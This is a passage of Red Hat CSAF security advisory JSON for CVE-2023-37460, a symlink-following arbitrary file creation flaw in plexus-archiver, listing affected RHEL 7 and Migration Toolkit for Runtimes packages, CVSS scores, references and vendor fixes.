"relates_to_product_reference": "7Workstation-optional-7.9.Z" } ] }, "vulnerabilities": [ { "cve": "CVE-2023-37460", "cwe": { "id": "CWE-61", "name": "UNIX Symbolic Link (Symlink) Following" }, "discovery_date": "2023-10-05T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2242288" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Plexus Archiver. While using AbstractUnArchiver for extracting, an archive might lead to arbitrary file creation and possible remote code execution (RCE). 
Extracting an archive with an entry in the destination directory as a symbolic link whose target does not exist will bypass the directory destination verification.", "title": "Vulnerability description" }, { "category": "summary", "text": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver", "title": "Vulnerability summary" }, { "category": "other", "text": "There are factors beyond the attacker\u0027s control. For example, the victim\u0027s server must have an incomplete SSH server configuration by not having the \"~/.ssh/authorized_keys\" existent and also having an SSH Server Port externally accessible. So, an attacker would need, even in other scenarios, to gather configuration settings and previous knowledge about the environment in order to have a successful attack. The impact is Important as code execution might happen, but it is not guaranteed.\n\nRed Hat Fuse 7 contains plexus-archiver as a transitive dependency and does not make it vulnerable during runtime, hence the low impact.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", 
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2023-37460" }, { "category": "external", "summary": "RHBZ#2242288", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2023-37460", "url": "https://www.cve.org/CVERecord?id=CVE-2023-37460" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460" }, { "category": "external", "summary": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m", "url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m" }, { "category": "external", "summary": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/", "url": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/" } ], "release_date": "2023-07-25T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-11-13T09:42:49+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", 
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:6886" }, { "category": "workaround", "details": "No mitigations are available for this issue.", "product_ids": [ "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", 
"7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch" ] } ], "threats": [ { "category": "impact", "details": "Important" } ], "title": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver" } ] }
rhsa-2023_6886
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "An update for plexus-archiver is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "The Plexus project provides a full software stack for creating and executing software projects. Based on the Plexus container, the applications can utilise component-oriented programming to build modular, reusable components that can easily be assembled and reused. The plexus-archiver component provides functions to create and extract archives.\n\nSecurity Fix(es):\n\n* plexus-archiver: Arbitrary File Creation in AbstractUnArchiver (CVE-2023-37460)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. 
and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2023:6886", "url": "https://access.redhat.com/errata/RHSA-2023:6886" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important" }, { "category": "external", "summary": "2242288", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2023/rhsa-2023_6886.json" } ], "title": "Red Hat Security Advisory: plexus-archiver security update", "tracking": { "current_release_date": "2024-12-17T23:06:24+00:00", "generator": { "date": "2024-12-17T23:06:24+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.3" } }, "id": "RHSA-2023:6886", "initial_release_date": "2023-11-13T09:42:49+00:00", "revision_history": [ { "date": "2023-11-13T09:42:49+00:00", "number": "1", "summary": "Initial version" }, { "date": "2023-11-13T09:42:49+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-12-17T23:06:24+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat Enterprise Linux Client Optional (v. 7)", "product": { "name": "Red Hat Enterprise Linux Client Optional (v. 
7)", "product_id": "7Client-optional-7.9.Z", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:7::client" } } }, { "category": "product_name", "name": "Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product": { "name": "Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.9.Z", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:7::computenode" } } }, { "category": "product_name", "name": "Red Hat Enterprise Linux Server Optional (v. 7)", "product": { "name": "Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.9.Z", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:7::server" } } }, { "category": "product_name", "name": "Red Hat Enterprise Linux Workstation Optional (v. 7)", "product": { "name": "Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.9.Z", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:7::workstation" } } } ], "category": "product_family", "name": "Red Hat Enterprise Linux" }, { "branches": [ { "category": "product_version", "name": "plexus-archiver-0:2.4.2-6.el7_9.src", "product": { "name": "plexus-archiver-0:2.4.2-6.el7_9.src", "product_id": "plexus-archiver-0:2.4.2-6.el7_9.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/plexus-archiver@2.4.2-6.el7_9?arch=src" } } } ], "category": "architecture", "name": "src" }, { "branches": [ { "category": "product_version", "name": "plexus-archiver-0:2.4.2-6.el7_9.noarch", "product": { "name": "plexus-archiver-0:2.4.2-6.el7_9.noarch", "product_id": "plexus-archiver-0:2.4.2-6.el7_9.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/plexus-archiver@2.4.2-6.el7_9?arch=noarch" } } }, { "category": "product_version", "name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "product": { "name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "product_id": 
"plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/plexus-archiver-javadoc@2.4.2-6.el7_9?arch=noarch" } } } ], "category": "architecture", "name": "noarch" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch" }, "product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch", "relates_to_product_reference": "7Client-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src" }, "product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src", "relates_to_product_reference": "7Client-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch" }, "product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "relates_to_product_reference": "7Client-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 
7)", "product_id": "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch" }, "product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch", "relates_to_product_reference": "7ComputeNode-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src" }, "product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src", "relates_to_product_reference": "7ComputeNode-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch" }, "product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "relates_to_product_reference": "7ComputeNode-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch" }, "product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch", "relates_to_product_reference": "7Server-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src" }, "product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src", "relates_to_product_reference": "7Server-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Server Optional (v. 
7)", "product_id": "7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch" }, "product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "relates_to_product_reference": "7Server-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch" }, "product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch", "relates_to_product_reference": "7Workstation-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src" }, "product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src", "relates_to_product_reference": "7Workstation-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch" }, "product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "relates_to_product_reference": "7Workstation-optional-7.9.Z" } ] }, "vulnerabilities": [ { "cve": "CVE-2023-37460", "cwe": { "id": "CWE-61", "name": "UNIX Symbolic Link (Symlink) Following" }, "discovery_date": "2023-10-05T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2242288" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Plexus Archiver. While using AbstractUnArchiver for extracting, an archive might lead to arbitrary file creation and possible remote code execution (RCE). 
Extracting an archive with an entry in the destination directory as a symbolic link whose target does not exist will bypass the directory destination verification.", "title": "Vulnerability description" }, { "category": "summary", "text": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver", "title": "Vulnerability summary" }, { "category": "other", "text": "There are factors beyond the attacker\u0027s control. For example, the victim\u0027s server must have an incomplete SSH server configuration by not having the \"~/.ssh/authorized_keys\" existent and also having an SSH Server Port externally accessible. So, an attacker would need, even in other scenarios, to gather configuration settings and previous knowledge about the environment in order to have a successful attack. The impact is Important as code execution might happen, but it is not guaranteed.\n\nRed Hat Fuse 7 contains plexus-archiver as a transitive dependency and does not make it vulnerable during runtime, hence the low impact.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", 
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2023-37460" }, { "category": "external", "summary": "RHBZ#2242288", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2023-37460", "url": "https://www.cve.org/CVERecord?id=CVE-2023-37460" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460" }, { "category": "external", "summary": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m", "url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m" }, { "category": "external", "summary": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/", "url": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/" } ], "release_date": "2023-07-25T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-11-13T09:42:49+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", 
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:6886" }, { "category": "workaround", "details": "No mitigations are available for this issue.", "product_ids": [ "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", 
"7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch", "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src", "7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch" ] } ], "threats": [ { "category": "impact", "details": "Important" } ], "title": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver" } ] }
RHSA-2023:6138
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "An update is now available for Migration Toolkit for Runtimes.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Security Fix(es):\n\n* plexus-archiver: Arbitrary File Creation in AbstractUnArchiver (CVE-2023-37460)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. 
and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2023:6138", "url": "https://access.redhat.com/errata/RHSA-2023:6138" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important" }, { "category": "external", "summary": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=migration.toolkit.runtimes\u0026downloadType=distributions", "url": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=migration.toolkit.runtimes\u0026downloadType=distributions" }, { "category": "external", "summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2023-003", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2023-003" }, { "category": "external", "summary": "2242288", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288" }, { "category": "external", "summary": "WINDUPRULE-1038", "url": "https://issues.redhat.com/browse/WINDUPRULE-1038" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2023/rhsa-2023_6138.json" } ], "title": "Red Hat Security Advisory: Migration Toolkit for Runtimes security update", "tracking": { "current_release_date": "2025-01-06T20:02:11+00:00", "generator": { "date": "2025-01-06T20:02:11+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.5" } }, "id": "RHSA-2023:6138", "initial_release_date": "2023-10-26T10:05:45+00:00", "revision_history": [ { "date": 
"2023-10-26T10:05:45+00:00", "number": "1", "summary": "Initial version" }, { "date": "2023-10-26T10:05:45+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2025-01-06T20:02:11+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Migration Toolkit for Runtimes 1 on RHEL 8", "product": { "name": "Migration Toolkit for Runtimes 1 on RHEL 8", "product_id": "Migration Toolkit for Runtimes 1 on RHEL 8", "product_identification_helper": { "cpe": "cpe:/a:redhat:migration_toolkit_runtimes:1.0::el8" } } } ], "category": "product_family", "name": "Migration Toolkit for Runtimes" } ], "category": "vendor", "name": "Red Hat" } ] }, "vulnerabilities": [ { "cve": "CVE-2023-37460", "cwe": { "id": "CWE-61", "name": "UNIX Symbolic Link (Symlink) Following" }, "discovery_date": "2023-10-05T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2242288" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Plexus Archiver. While using AbstractUnArchiver for extracting, an archive might lead to arbitrary file creation and possible remote code execution (RCE). Extracting an archive with an entry in the destination directory as a symbolic link whose target does not exist will bypass the directory destination verification.", "title": "Vulnerability description" }, { "category": "summary", "text": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver", "title": "Vulnerability summary" }, { "category": "other", "text": "There are factors beyond the attacker\u0027s control. For example, the victim\u0027s server must have an incomplete SSH server configuration by not having the \"~/.ssh/authorized_keys\" existent and also having an SSH Server Port externally accessible. 
